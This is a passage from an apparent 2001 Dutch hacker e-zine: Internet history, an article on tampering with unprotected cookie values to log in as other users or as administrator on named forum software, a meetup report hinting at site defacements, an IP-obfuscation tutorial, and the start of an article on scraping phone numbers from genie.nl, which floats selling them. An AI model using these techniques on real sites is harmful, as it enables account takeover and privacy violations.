gegevens kunnen uitwisselen. Baran schreef ook andere aspecten van het
netwerk, waaronder:
* de beveiliging
* een schema met prioriteiten (en apparaten om te voorkomen dat het netwerk
overbelast raakte)
* de vereiste hardware
* de kosten
Jammer genoeg was Baran zijn tijd ver vooruit met zijn ideeen. Het Pentagon
had weinig vertouwen in zulke radicale ideeen. Baran schreef een rapport dat uit
elf delen bestond voor autoriteiten van het ministerie van defensie, dat echter
prompt in de la verdween. Zoals later bleek, liep de geboorte van Internet door
deze kortzichtigheid van het Pentagon vertraging op, maar niet lang. Rond 1965
nam de druk opnieuw toe. Er werden fondsen vrijgemaakt om een gedecentraliseerd
computernetwerk te ontwikkelen en in 1969 werd dat netwerk realiteit. Dit
systeem werd ARPANET genoemd.
ARPANET was een eenvoudig netwerk. Het bestond uit links tussen computers in
vier academische instituten
(Stanford Research Institute, de universiteit van Utah, de universiteit van
Californie in Los Angeles en de universiteit van Californie in Santa Barbara).
Een van de computers was een DEC PDP-10. Deze antieke exemplaren zijn
tegenwoordig handiger als meubelstuk dan als computer. Ik vermeld de PDP-10 hier
echter, zodat ik het kan hebben over een andere legende uit de
computergeschiedenis.
Ongeveer op hetzelfde ogenblik was er een bedrijf in Washington dat
computertimesharing introduceerde. (dit was een systeem waarbij klanten
computertijd konden huren. Ze moesten daarvoor meestal per uur betalen)
Het bedrijf nam twee jonge, intelligente (hrmz dit had ik maar beter niet
moeten schrijven) mensen in dienst die software moesten testen. In ruil voor hun
diensten kregen de jongens gratis toegang tot een PDP-10. (Dit zou tegenwoordig
equivalent zijn van gratis toegang tot een particulaire BBS)
Jammer genoeg voor de jongens ging het bedrijf korte tijd later failliet,
maar de ervaring die ze er hebben opgedaan, zou hun leven ingrijpend veranderen.
Op dat ogenblik waren ze net oud genoeg voor de middelbare school. Op dit
ogenblik zijn het veertigers. Die twee jongens waren Bill Gates en Paul Allen.
Hoe dan ook, ARPANET ging bescheiden van start: het netwerk bestond uit
vier computers die via een telefoonlijn met elkaar waren verbonden. Dat was
toen nog een verbazingwekkende vinding. De eerste euforie rond ARPANET
verdween echter snel toen de technici ontdekten dat er wat problemen waren.
Een van die problemen was dat ze geen besturingssysteem hadden om het immense
netwerk te creeren dat Baran had bedacht.
Het voorval speelde hierin echter een belangrijke rol. Ergens in het midden
van de VS waren onderzoekers een obscuur besturingssysteem aan het ontwikkelen.
Hun onderzoekswerk vond op hetzelfde ogenblik plaats als het onstaan van ARPANET
en het zou de wereld voorgoed veranderen. Dit besturingssyteem zal ik in het
volgende deel bespreken, het besturingssyteem heet UNIX.
Als je nog de volledige memorandum en het rapport van Baran wilt lezen.
Kun je de documenten vinden op http://www.rand.org/publications/electronic.
Angelicus Cytrus Dominus aka Ange|icuz
angelicus_cytrus_dominus@hotmail.com
-------------------------------------------------------
09. Creatief met cookies
-------------------------------------------------------
Inleiding
Als je het over cookies hebt denkt men meestal gelijk aan schending van de
privacy door web adverteerders. Er wordt vaak niet stilgestaan bij het feit dat
er nog veel interesantere dingen mee te doen zijn. Programmeurs vergeten vaak
dat dat cookies in een gewone text file worden opgeslagen, en dat ze dus
verandert kunnen worden. Gelukkig zijn er ook nog programmeurs die hier wel
rekening mee houden en de cookies versleutelen, maar soms is de versleuteling
niet meer dan een slechte vermomming.
Alle voorbeelden komen uit de cookies file van netscape, netscape slaat de
cookies op in een text bestand dat onder *nix te vinden is in
~/.netscape/cookies. Onder windows staat deze file in
c:\program files\netscape\users\profielnaam\cookies.txt.
Er wordt pas naar de cookies file geschreven als je netscape afsluit, als je dus
veranderingen aanbrengt moet je ze opslaan als netscape al afgesloten is.
Gebruik je een andere browser of besturingssysteem zal je 't zelf uit moeten
zoeken.
Wat zijn HTTP cookies precies?
Waarschijnlijk weet je dit al, maar voor de echte cluebies geef ik toch maar een
korte uitleg. Cookies zijn kleine stukjes info die door bijv. cgi scripts
gebruikt worden om informatie op te slaan op de computer van de gebruiker en
later weer naar de server terug gestuurd worden. Dit wordt vaak gebruikt om
bepaalde instellingen van de bezoeker op te slaan, zodat hij niet iedere keer
als hij op die pagina komt alles opnieuw moet instellen.
Voor informatie over hoe 't allemaal precies in z'n werk gaat moet je maar even
kijken op http://home.netscape.com/newsref/std/cookie_spec.html want daar gaat
dit artikel niet over.
Waar het wel over gaat is dat op veel websites waar je een account moet aanmaken
om gebruik te kunnen maken van bepaalde services de optie wordt gegeven om het
wachtwoord op te slaan. Op veel andere websites wordt deze optie niet eens
gegeven, maar wordt het automatisch gedaan. Handig wel, veilig meestal niet.
Zoals ik al zei, cookies worden opgeslagen (iniedergeval door netscape) in een
normaal text bestand. De waarden van die cookies kunnen dus ook verandert
worden. Als er (zoals bij veel websites) totaal geen encryptie of iets
dergelijks wordt gebruikt voor de waarden van de cookies kan je die dus gewoon
veranderen.
Een aantal voorbeelden van dit soort fouten:
Naamloze e-commerce website.
Als eerste een website waarvan ik de naam niet zal vrijgeven. Dit is een
standaard postorder befrijf waar je via de website je bestelling moet plaatsen
(zoals bij zoveel sites). Deze site had net een webtrust zegel gekregen, en had
deze ook vol trots op de pagina staan samen met het webtrader zegel... Dan vraag
je erom natuurlijk.. Om te kunnen bestellen moet je jezelf eerst registreren, en
dus een hoop persoonlijke informatie geven, zoals naam, adres, woonplaats e.d..
Na het inloggen werden er 3 cookies verstuurd (uit de cookies file van
netscape):
host FALSE / FALSE 1234567890 UserID 12345
host FALSE / FALSE 1234567890 Email blah%40blah%2Ecom
host FALSE / FALSE 1234567890 BasketID 12345
Als er 1 van de cookies verandert wordt, maar de rest blijft hetzelfde blijf je
ingelogd onder je eigen account. Alle cookies die teruggestuurd worden moeten
dus bij dezelfde gebruiker horen. Maar moeten we wel alle cookies terug sturen?
Als je alleen het UserID cookie tergu stuurt (en dus de andere 2 verwijdert uit
je cookies file) ben je nogsteeds ingelogd. En als je alleen de UserID nodig
hebt zou je die dus kunnen veranderen in een ander nummer. Als je dus inplaats
van alle drie de cookies alleen dit terug stuurt (met en ander nummer als UserID
dus):
host FALSE / FALSE 1234567890 UserID 12342
Ben je ingelogd als de persoon met UserID 12342. Op deze website kon je op deze
manier alle informatie krijgen die ingevuld was tijdens het registreren, wat er
door deze persoon bestelt was en wanneer. Credit card gegevens waren niet te
krijgen, maar het is toch een flinke inbreuk op de privacy van de gebruikers, ik
denk tenminste dat mijnheer jansen er niet blij mee zal zijn dat ik kon zien
waar hij woont, en wanneer hij een nieuwe palmpilot bestelt had... Gelukkig was
dit 2 uur nadat ik het gemeld had al opgelost.
tForum
tForum is de forum software die onder anderen op viper's DMRT forum gebruikt
wordt. Het bied de mogelijkheid om bepaalde boards alleen toegankelijk te maken
voor bepaalde gebruikers. Na het inloggen worden er 4 cookies verstuurd, waarvan
er maar 2 echt interesant zijn:
dmrt.dyndns.org TRUE /forum FALSE 1234567890 UserInfoCookie[UserName]
AlphaVersion
dmrt.dyndns.org TRUE /forum FALSE 1234567890 UserInfoCookie[Password]
<cleartext password>
Je zou verwachten dat als je dus naar dat forum toe gaat het password gecheckt
wordt, maar dat is niet het geval. Het password dat via het cookie naar de
server wordt verstuurd wordt alleen gebruikt om het vast in te vullen in het
formulier om te posten. Om dus als een andere gebruiker in te loggen hoef je
alleen de username maar te veranderen. In principe kan dit weinig kwaad, behalve
als er boards zijn die alleen gelezen mogen worden door bepaalde gebruikers.
Ultimate Bulletin Board
Ultimate Bulletin Board is een commercieel (en duur) forum gemaakt door infopop
(www.infopop.com). Na het inloggen (tering, wordt eentonig...) worden er 2
cookies verstuurd:
host FALSE / FALSE 1234567890 login2451956.1435 02-16-
2001%2012%3A54%20PM&2451957.1254
host FALSE / FALSE 1234567890 ubber2451956.1435
av&<password>&AlphaVersion&45&00000031
Wat de nummers in de naam van de cookies precies inhouden weet ik niet. Het
eerste cookie is niet echt interesant, tenzij je vergeten bent wanneer je nou
bent ingelogd. Het 2e cookie daarentegen is een stuk interesanter. Deze bestaat
uit 5 delen: de inlognaam, het password (ook in plaintext), de volledige naam
van de gebruiker (de naam die weergegeven wordt als je iets post), een nummer
waarvan ik geen flauw idee heb waar 't voor dient, en als laatste een nummer dat
vergelijkbaar is met het UserID nummer van de naamloze e-commerce site, alleen
hier is het 8 cijfers, opgevuld met nullen. In dit geval is mijn login naam dus
av, de volledige naam die te zien is als ik iets post is AlphaVersion en mijn
gebruikersnummer (bij gebrek aan een betere term) is 00000031. Het
gebruikersnummer van andere gebruikers is te vinden in de posts (als er bij de
naam staat "Member #12" is het gebruikersnummer 00000012). Het wachtwoord en de
login naam worden weer niet gecheckt. Je hoeft dus alleen het gebruikersnummer
te veranderen om als een andere gebruiker in te loggen. Je kan nu posten,
berichten(van de gebruiker) editen, info (email adress e.d.) en het wachtwoord
veranderen. Als je het nummer verandert in 00000001 ben je administrator en kun
je zo'n beetje alles dat er te doen is met het bulletin board. Als dat allemaal
nog niet erg genoeg is, wordt als je inlogt door het gebruikersnummer te
veranderen het tweede cookie opnieuw gestuurd, alleen nu met de login naam, het
wachtwoord en de volledige naam die bij het gebruikersnummer dat je hebt
ingevuld horen.
Conclusie
Root access zal je hierdoor niet krijgen, het komt ook gelukkig niet extreem
vaak voor, maar helaas toch vaker als je zou denken. Het lijkt wel of
programmeurs gewoon vergeten op te letter of de cookies die ze terug krijgen ook
wel echt de cookies zijn die ze verzonden hebben en of ze wel allemaal terug
gestuurd worden.
Dit soort fouten zijn makkelijk te vinden, lees die cookies file en wees een
beetje creatief. Let er ook op dat als iets onleesbaar lijkt dit niet altijd het
geval is, slashdot (nee, voor zover ik weet zitten er in de cookies van slashdot
geen fouten) bijvoorbeeld "versleuteld" het cookie dat verstuurd wordt door
inplaats van normale text de hexidecimalen te gebruiken, en daar %25 voor te
zetten, eerst het user nummer, daarna 2 keer een :, en dan het password.
Ik hoop dat je hier iets aan heb, of dat ik je in iedergeval even bezig heb
gehouden,
AlphaVersion
-------------------------------------------------------
10. Meetingverslag Grote H4H Meeting te Arnhem 10-3-01
-------------------------------------------------------
Hier is hij dan eindelijk: het verslag van de H4H-meeting te Arnhem op 10 Maart
2001. Vanwege een complete aanval van inspiratieloosheid en luiheid is er geen
verslag van de meeting te Haarlem geweest. Hiervoor nog mijn excuses.
Zoals gezegd vond de meeting plaats op 10 Maart 2001. En wederom in Arnhem, net
zoals het jaar ervoor. Het verzamelpunt was weer in de stationshal van NS-
station Arnhem. De aanwezigen op de meeting waren:
Redactie: Asby, Berry, ViPER, N|ghtHawk. Lezers: CyberCat, cb3rob, Cinder,
Digital Overdrive, Dugo, F399, Flunk, flyahh, LordRaYde, max, Spectral, Tw!zz,
MrVisjes, Loba, safumufh, Wayang Master, scrippie, dvorak, en taezz. Jaja, er
was ook deze meeting weer een vrouwelijk persoon aanwezig. Helaas was het er
maar eentje. Maar we vonden het heel dapper van taezz om de hele dag om te gaan
met een grote groep geeks.
Helaas moesten we deze meeting Tozz en Ivo_ van de redactie missen. We hopen dat
ze de volgende meeting weer van de partij zijn.
Bij het verzamelen op het station werd er besloten alvast een deel van de groep
naar het eerste café te laten gaan. Want op een of andere duistere reden werden
we nauwlettend in de gaten gehouden door het NS-personeel (ja die deden toen
nog wat anders dan staken). We tasten nog steeds in het duister waarom ze zoveel
interesse hadden in een groep vaag uitziende figuren. Had vast ook niets te
maken met het verschijnen van bepaalde stickertjes overal in de stad.
Nadat ook de rest was ontvangen ging ook de tweede helft naar het eerste café (
Plaza café ). Daar werden netjes de namen opgenomen en genoten van het eerste
biertje van de dag, hoewel dat niet voor iedereen opgaat, want er waren al wat
blikjes bier van het merk "H4H" achterover gegooid door bepaalde lieden. Voor
meer info over dit bier verwijs ik u door naar de foto's van de meeting en een
bepaalde pizza site....
In het café werden de groepen bepaald voor het lasergamen. Natuurlijk werden de
groepen weer samengesteld door N|ghtHawk. Omdat er 16 mensen het aandurfde om
het lasergame hol te betreden werden er twee teams van 8 man samen gesteld. Het
rode team met: Asby, ViPER, N|ghtHawk, cb3rob, Digital Overdrive, flyahh,
safumufh en MrVisjes. De rest werd in het gele team geduwd: Cinder, F399, Flunk,
LordRaYde, Spectral, CyberCat, Tw!zz en Wayang Master.
Het was aan de samenstelling van de teams al te zien wie er de teams indeelde,
F399 was het hier blijkbaar niet zo best mee eens. Want die probeerde N|ghtHawk
ervoor te defacen. Maar N|ghtHawk was er op voorbereid en startte een counter
attack. De stickers vlogen dus om de oren. Nadat de kinders uitgespeeld waren
werd er besloten de strijd verder voort te zetten in de lazergame hal ( dit in
Jules Lazergames ). Omdat het gele team al van te voren doorhad dat het Rode
team ze dik zou inmaken zorgde ze ervoor dat het pak van een van onze topkillers
het af liet weten. We zijn nog steeds benieuwd wie van het gele team de
lasergame server geroot heeft. Maarja, we zien het maar als een deel van de
strijd. Van het rode team was cb3rob dus niet actief wegens een kapot pak.
Daardoor werd het dus eigenlijk 8 tegen 7. Het was een zware strijd in de
lasergame hal. Nog nooit hadden zoveel computernerds samen zoveel gezweet. Dat
was weer eens wat anders dan het de hele dag op je reet zitten op een stoel
achter de computer. Er werd ook weer ontdekt dat het lasergamen in irl een stuk
zwaarder is dan quaken. Na een lange zware strijd, veel gevoel, gezweet en het
neerschieten van eigen teamleden was ons half uurtje weer om. Totaal afgepeigerd
kwamen de warriors weer naar buiten gestrompeld. Dat viel toch niet mee. Tijdens
het weer op adem komen kregen we de uitslag. Het rode team kwam op 70,620 punten
en het gele team op 79,579 punten. Het rode team moest dus de overwinning laten
gaan aan het gele team. Maar we blijven er bij dat het doorgestoken kaart was.
Beetje een van onze warriors uitschakelen om te kunnen winnen....grmbls. De
FragMaster van vorig jaar kon helaas niet aanwezig zijn op de meeting. Dus kon
ook zijn titel niet verdedigen. De fragmaster titel van vorig jaar van BlueLive
ging dit jaar dus naar een ander. Het was een zware strijd voor de fragmasters,
maar de winnaar was Wayang Master met 16,850 punten met als tweede N|ghtHawk met
15,921 punten. Daarna kwam er een hele tijd niets, en dan nog een hele tijd
niets en dan ergens eens een keertje de rest van de gamers. N|ghtHawk heeft de
fragmasterstitel moeten laten gaan naar de Wayang Master dus, maar die zal
ongetwijfeld enge oosterse sluiptechnieken hebben....
Na het o zo vermoeiende lasergamen werd er druk nagepraat in het café, mensen
vochten hun vetes nog uit over de airhockey om goed duidelijk te maken wie de
winnaar was. Maar ook een computernerd krijgt zo nu en dan wel eens honger en er
werd besloten daar wat aan te gaan doen. Nee, er werd geen pizza besteld, we
splitsten ons op om op verschillende plaatsen te gaan eten. Een groot deel van
de groep ging naar de Mac, wat ook niemand zal verbasen. Onderweg werd weer een
duidelijk spoor achtergelaten voor de mensen die wat later waren. En zelfs de
binnenkant van de Mac werd enigszins gedefaced. Iets waarmee je toch eigenlijk
beter kan wachten totdat je weer naar buiten gaat. Indien je nog naar binnen
wil. Toen de laatste hun eten eindelijk besteld hadden waren de eerste
natuurlijk alweer klaar. Zo zie je maar weer wie de beste SE-skillz hebben.
Degene die als laatst moet eten heeft de SE-skillz van een visstick. Bepaalde
mensen weten zelf wie er als laatste waren. Het niet op elkaar wachten en geen
ruimte voor elkaar maken geeft weer aan hoe sociaal de gemiddelde computernerd
is.
Toen ook de laatste de maaltijd van karton en lucht naar binnen hadden gewerkt
werd het tijd om naar de poolhal te gaan (House of Biljards). Daar verwachtte ze
een groep van zo een man of 75. Berry had dus een grotere opkomst verwacht, laat
dit een hint zijn voor de mensen die niet aanwezig waren. De poolhal was aardig
donker van binnen, wat je dan natuurlijk weer bedenkingen geeft over waar je nou
eigenlijk bent. Maar het was toch een gewone poolhal, en het donker kwam sommige
mensen best goed uit, want dan zag de rest niet zo goed dat je moe was en er
beroerd uit zag. Sommige mensen moeten ook van de drank af blijven....
Voor degene die zich wat minder moe voelde waren er natuurlijk de pooltafels.
Waar dit jaar wederom iets werd gedaan met biljartballen en UTP knippen. Dit
lijkt nu toch een jaarlijks event te worden, en we kijken er al naar uit dat Dr.
Dugo ons volgend jaar weer de info verschaft. Misschien komen we er ooit
allemaal achter hoe het werkt. Of Dugo dit jaar wederom met zijn cybertool heeft
gedreigd is bij de redactie verder niet bekend.
N|ghtHawk ontdekte dat je naast poolen er ook kon darten. Dus na het betalen van
de borg voor de pijltjes met het geld van DigiOver daagde N|ghtHawk zijn grote
broer Asby uit. Asby droop na een flinke nederlaag weer af. Dus zocht N|ghtHawk
naar een ander waardig tegenstander. Zoals gewoonlijk wou weer niemand met
N|ghtHawk spelen. Het gevoel van alleen op het schoolplein staan kwam al weer
bij hem op. Teazz zag de verdriet in zijn ogen en offerde zich op. Omdat
N|ghtHawk nogal blij was met de aandacht van iemand en dan ook nog een meisje
liet hij teazz netjes winnen. Of was N|ghtHawk zo onder de indruk dat een meisje
met hem wou darten dat hij verloor? Hmmz, helaas zullen we het niet weten, maar
N|ghtHawk maakte teazz erna meteen maar in om haar geen sterallures te laten
krijgen. Overigens zou het voor sommige mensen wel handig zijn als er een
rekenmachine bij het dartbord zou liggen. al dat hoofd gereken komt niet
iedereen lekker uit.
Zoals aan elk gebeuren kwam ook na een aantal uur in de poolhal te hebben
gezeten een eind aan de meeting. De redactie vergezelde de gasten netjes naar de
trein toe. Eigenlijk meer uit zekerheid dat iedereen ook daadwerkelijk op de
trein stapte dan uit netheid. Sommige werd het gebruik van bepaalde middelen
duidelijk teveel, ik doel dan niet op bepaalde mensen hoor max. Maar niet meer
weten hoe een NS kaartjesautomaat werkt is best slordig, vervolgens in de trein
op je bek gaan staat ook niet netjes.
Op het station gaf Dugo ons nog een citaat mee voor het slapen gaan "In het land
der piemels is een kut koningin". Dit werd door Berry netjes op film gezet, dus
is bewaard voor het nageslacht. Daarnaast heeft Dugo nog wat conducteurs lastig
gevallen met het vragen of ze ook bier verkochten. En wij het maar vreemd vinden
dat ze gaan staken. Overigens schijnen twee bepaalde figuren van de meeting wat
in de trein te hebben gedaan. Verder hier op ingaan lijkt me niet verstandig
voor de jeugdige lezertjes. Maar N|ghtHawk en teazz schijnen het naar hun zin te
hebben gehad....
Toen echt daadwerkelijk iedereen in de trein zat was de meeting afgelopen,
althans voor de gasten. De redactie leden hadden nog een lange nacht te gaan. Ze
werden bij het slapen bij Berry vergezeld met DigiOver. Omdat N|ghtHawk al
eerder bij Berry had geslapen en ondertussen wist van de nachtelijke oerwoud
omzaag sessies van Berry, wou hij maar al te graag op de gang slapen. Na het aan
horen van deze verhalen besloot ook DigiOver de gang op te zoeken. De rest
besloot de confrontatie met Berry aan te gaan. Dat hebben ze weer geweten ook.
Het zal de volgende keer nog drukker zijn op de gang. Nu vraag ik me toch af of
het geen beter idee is om Berry voortaan uit zijn kamer te gooien op de
gang....hmmz.
Ondanks de rare hoofdpijnen de volgende morgen mocht H4H weer spreken van een
geslaagde meeting. We hopen dat er de volgende meeting weer zo iets gezelligs
van wordt gemaakt. Hopelijk met nog meer mensen.
Hier nog wat korte feiten van de meeting:
Wist U Dat:
- Loba met zijn SE-Skillz gratis bier weet te regelen in de supermarkt?
- N|ghtHawk hier medeplichtig aan was?
- LordRaYde helemaal geen pokemon kaartjes mee had naar de meeting?
- max niet freeworld binnenkomt maar daarom uit troost wel op de H4H-meeting
mocht komen?
- Berry het jammer vond dat zijn #gayteen.nl vrienden op een andere dag een
meeting hadden?
- wij van flyahh nog steeds niet de grap hebben gehoord over die twee kippen?
- Nynex op het laatste moment toch niet met die enge Asby en N|ghtHawk mee mocht
van zijn mams?
- dit vlak nadat N|ghtHawk zijn nieuwe (gothic) foto liet zien was?
- teazz toch wel eens duidelijk wil maken dat ze alleen van max is?
- CyberCat in alt.hack.nl N|ghtHawk al weken van te voren had uitgedaagd voor
het lasergamen?
- N|ghtHawk CyberCat genadeloos afslachtte?
- CyberCat vooral richtte op N|ghtHawks rug?
- CyberCat het niet kon hebben dat N|ghtHawk sneller en beweeglijker was?
- dat waarschijnlijk aan de leeftijd lag?
- we deze meeting onze SceneWhore moesten missen?
- de SceneGay zich daarom erg eenzaam voelde?
- we hopen dat Pipitaal er de volgende keer weer is?
- max zo nu en dan het nodig vond de notulist uit te schelden?
- de notulist vond dat max zichzelf al genoeg voor lul had gezet, hij daarom
hier nog redelijk gespaard blijft?
- de mensen het dit jaar langer uithielden dan vorig jaar?
- Flunk een pakje sigaretten vond?
- hij dacht dat die van cinder waren en die dus meenam?
- N|ghtHawk op onverklaarbare reden zijn sigaretten opeens kwijt was?
- N|ghtHawk van Flunk voor zijn verjaardag om een duistere reden sigaretten
kreeg?
- er de dag na de meeting enkele sites wat waren veranderd?
- dit er best een boel waren?
- niemand eigenlijk weet hoe dit kwam?
- iedereen alles ontkent erover?
- N|ghtHawk ook dit jaar een week na de meeting een verdacht pakje vond?
- dit aankwam op zijn verjaardag (14 Maart)?
- hij dit wederom wat eng vond om te openen, aangezien hij dit keer wel zijn
tandpasta mee genomen had?
- er in het pakje een cd zat die hij vergeten was bij Berry?
- er ook de lasergame uitslagen inzaten?
- deze lasergame uitslagen teveel werk zijn om over te typen?
- er nu nog steeds H4H stickers in Arnhem hangen?
- deze ook in bepaalde kleding zaken (CoolCat) hingen?
- wij benieuwd zijn of die het redden tot de meeting van volgend jaar?
- er de volgende H4H meeting waarschijnlijk weer T-shirts zijn?
- de H4H-redactie hier misschien een ontwerp wedstrijd voor gaat maken?
N|ghtHawk-H4H,2001
-------------------------------------------------------
11. Base10 nummers en IP nummers.
-------------------------------------------------------
Auteur: Digital Overdrive
E-mail : digiover@dsinet.org
Homepage : http://www.dsinet.org
--
Met dank aan :
Dugo (voor de scriptjes)
network-tools.com (voor de formule)
Greetz : #dsinet, #h4h, #hit2000, #root66 en #selwerd
--
Copyright : Deze textfile mag alleen *onveranderd* gecopieerd worden
--
Je hebt ze vast wel eens gezien, rare getallen wat later toch een soort IP
nummer blijkt te zijn. Veelal gebruikt door spammers die hopen zo annoniem te
blijven. Hier leg ik dus uit wat dat is en hoe je zoiets kan omrekenen.
Wat is Base10 eigenlijk ?
Base10 zijn getallen gevormd volgens het decimale stelsel. Binair is dus Base2,
octaal is Base8 en hexadecimaal is Base16.
Wat ben je nodig ?
Ik ga er hier van uit dat je een Linux-pc bij de hand hebt. heb je die niet dan
moet je zelf alles uitrekenen (d.m.v. een rekenmachine of gewoon op papier).
In mijn voorbeelden gebruik ik 209.237.160.164 (network-tools.com) als IP nummer
Nu moet je dus een manier bedenken om die IP-nummers te converteren naar Base10
nummers.
Dat kan met de volgende formule :
$1 * 256^3 + $2 * 65536 + $3 * 256 + $4
$1 = het 1e deel van een IP nummer, dus : 209
$2 = het 2e deel van een IP nummer, dus : 237
$3 = het 3e deel van een IP nummer, dus : 160
$4 = het 4e deel van een IP nummer, dus : 164
Dat wordt dus : 209 x (256)^3 + 237 x (256)^2 + 160 x (256)^1 + 164
De uitkomst is : 3522011300.
Nu gaan we die Base10 nummer pingen :
~$ ping 3522011300
PING 3522011300 (209.237.160.164): 56 data bytes
64 bytes from 209.237.160.164: icmp_seq=0 ttl=115 time=116.8 ms
--- 3522011300 ping statistics ---
2 packets transmitted, 1 packets received, 50% packet loss
round-trip min/avg/max = 116.8/116.8/116.8 ms
Dus nu zien we dat het klopt. Je kan ook http://3522011300/ bezoeken met een
browser.
Alles wat links van een Base10 nummer staat kan je weglaten. Dus als iemand
spamt met anonymous@3522011300, kan je die anonymous@ gewoon weglaten.
Heb je een Linuxbak dan kan je het heel snel omrekenen met dit comandline
scriptje:
~$ echo $1|awk -F. '{print $1" * 256^3 + "$2" * 65536 + "$3" * 256 + "$4}'|bc
Verander de $1, $2, $3 en $4 in de verschillende octets van het IP nummer.
Zijn er nog andere manieren om dit te doen ?
Ja, je kan ook het IP nummer eerst omrekenen naar binarie, haal de punten eruit
en reken het dan om naar decimaal.
Voorbeeld :
209.237.160.164
Eerst gaan we 209 omrekenen (alle octets moeten apart) : 11010001
237 : 11101101
160 : 10100000
164 : 10100100
Dus: 209.237.160.164 = 11010001.11101101.10100000.10100100.
Dit kan heel makelijk met het volgende scriptje :
#!/bin/sh
for i in `echo $1|tr "." " "`; do printf "obase=2\n$i\n"|bc; done
~$ chmod +x <script>.
~$ ./script <ipnummer>
Zet het achter elkaar en haal de dots (".") eruit :
11010001111011011010000010100100 en reken dit weer
om naar decimaal = 3522011300
Dat kan met het volgende scriptje :
#!/bin/sh
printf "ibase=2\n$1\n" |bc
~$ chmod +x <script>.
~$ ./script2 <binair getal>
Digital Overdrive, 18/12/2000
-------------------------------------------------------
12. Kort.
-------------------------------------------------------
Kort is een nieuw terugkomend item in H4H, In dit deel bespreken wij nieuwtjes
op het gebied van security, artikeltjes die wij tegen kwamen in de ICT
vakbladen, forums e.d. Natuurlijk mogen lezers ook stukjes aandragen, dat kan
naar het standaard adres voor artikelen artikel@hackers4hackers.org.
--
Java-Simkaarten
Sinds kort zijn er ook "Interoperabele Java-gebaseerde Simkaarten", met de java
programmeertaal en de interoperabele simkaarten kunnen mobile operators sneller
nieuwe diensten aanbieden. De ondernemingen die met deze Simkaarten gaan komen
noemen het een belangrijke ontwikkeling voor simkaarten met java-mogelijkheden.
Ontwikkelaars van mobiele telefoons kunnen nu java-ondersteuning inbouwen in hun
apparatuur zonder zich zorgen te maken over compatibiliteit tot voor kort was
dat problematisch wegens de verschillende kaarten en de inzet van mobiele
telefoons in verschillende markten. Dit lijkt in onze ogen een gevaarlijke
ontwikkeling en wij vragen ons af hoelang het gaat duren voordat er het eerste
echte GSM virus gaat komen die de Sim kaart zal infecteren !
Op de website www.slb.com kan je hier meer informatie over vinden.
--http://www.securitydatabase.net
Een paar maanden geleden ben ik een Security Web Forum begonnen
op mijn kabel modem. Dat ondertussen best een succes is geworden
Zoals menig mens al is opgevallen loopt het forum letterlijk storm de
laatste tijd. Gezien het aantal bezoekers bleef stijgen en mijn kabel
modem rook begon te geven hebben de mensen van synnergy.net
de helpende hand uitgestoken vandaar dat hij nu een nieuwe
locatie heeft gekregen. Ondertussen ben ik allang niet meer
alleen in beheer en helpen een hoop andere mensen mee.
Ook zijn wij op dit moment het beste - op content gebaseerde - security
portal van de Benelux, er is geen enkel ander portal die completer of
actueler is, er zijn al verschillende artikelen die door andere media van
onze site zijn gebruikt en ook hebben een paar exclusieve verhalen van
onze portal de andere media bereikt.
Wij zijn in een beginnend stadium, en in de enkele weken waarin het
nieuwe forum draait hebben wij een kleine 100.000 page views te
verwerken gehad, ook een aantal dreigementen, waaronder die
van O'reilly -ja die goede boeken uitgeverij -.
Verder kunnen wij met trots vertellen dat de meeste grote namen
uit de hackscene als wel security scene geregeld nieuwtjes aan
ons doorspeelt. Hiermee hebben wij voor dagelijks security news
feed, een grote meer waarde, omdat er geregeld informatie te vinden
is voordat die elders opduikt.
Uiteindelijk heeft de SecurityDatabase ten doel om door gezamenlijk
enige tijd te investeren -we streven naar maximaal 35
minuten per week!- een erg goede, actuele nieuwsbron neer
te zetten, die men -omdat het om de database gaat- voor
eigen doeleinden vrij kan gebruiken. Het kan dus zijn dat
iemand die een bijdrage levert -in de vorm van moderator-
aan database, de content voor zijn eigen site kan gebruiken,
zodat ook hij of zij op zijn site over de laatste nieuws kan beschikken.
Momenteel hebben wij meer dan 30 moderators, we zijn richtlijnen
aan het opstellen waaraan moderators moeten voldoen,
zodat de kwaliteit nog veel verder omhoog geschroefd kan worden.
Ook zijn wij erg blij met alle positieve reacties die we hebben
mogen ontvangen van de GURU's uit Nederland, die veelal anoniem
zich geregistreerd hebben. Het doet ons goed om te horen dat
we de juiste kant op gaan, en ook met hun input zullen
wij de stijgende lijn weten door te zetten.
Nieuwsgierig geworden?
Kijk dan eens op www.securitydatabase.net
Hieronder een aantal topics die nogal hoog opliepen:
Linus Tovalds: MacOS X is rotzooi
http://security.synnergy.net/forum/viewtopic.php?TopicID=1466
Jurisprudentie inzake schending privacy email door werkgever
http://security.synnergy.net/forum/viewtopic.php?TopicID=1388
Kevin Mitnick's Tech Obsession - Asperger Syndrome ?
http://security.synnergy.net/forum/viewtopic.php?TopicID=1336
Wij hopen hiermee te kunnen aantonen richting de samenleving,
dat er wel degelijk een groep mensen in Nederland bestaat die
een positief licht wil schijnen over het gehele onderwerp van
Informatiebeveiliging. Immers kennis maakt iets veiliger,
rechtzaken, defacements en andere gekloot met andermans
infrastructuur niet!
-ViPER
-------------------------------------------------------
13. Genie.nl
-------------------------------------------------------
Hallo beste mensen,
Mijn naam is Flip^, naja mijn nickname :)
Dit is mijn eerste artikel in de hackers4hackers.org "krant"
ook al volg ik alles toch al redelijk lang maarja op een gegeven
moment hoor je je roeping en begin je eens te typen :)
Het zit namelijk zo, ik heb enige tijd geleden een bug gevonden
in de architectuur van de site van genie.nl (je weet wel die site
die claimt de beste/grootste sms site van nl te zijn, en wat we
allemaal moeten weten via irritante reclames). Het is namelijk
mogenlijk nummers uit het adresboek te halen van andere users.
Waarschijnlijk is dit niet te bedoeling maar het is wel leuk
aangezien genie.nl alleen maar geld kan verdienen met reclame EN
de nummers verkopen aan derde zodat zij kunnen gaan spammen (wat
dan geld zou moeten gaan opbrengen).
Naja je ziet hem wel aan komen denk ik. Als je al die nummers
uit de dbase kan gaan lopen halen zit genie.nl met een probleem.
Immers jij kan nu net zo hard die nummer gaan verkopen zodat
genie.nl geen inkomsten meer heeft. Blijkbaar vindt genie dat
helemaal niet zo erg aangezien ze na meer dan 50 dagen nog nix
veranderd hebben aan de architectuur/bug.
Ik heb dus maar ff een scripje gemaakt in php aangezien dat het
enige is wat ik een beetje redelijk kan programmeren en het is
vrij anoniem omdat je het op elke freephpsite service kan
installeren :) Je hebt hier overgens wel een (mysql)database account
voor nodig maar die dingen kun je ook vast wel ff ergens gratis
ritselen :)
Ooh het is me echter niet gelukt de rotzooi zoals naam eruit te
halen maarja, anders stuur je maar gewoon ff een gratiz smsje
met genie naar het telnummer :)
Je moet het zelf maar ff doorkijken en vullen...
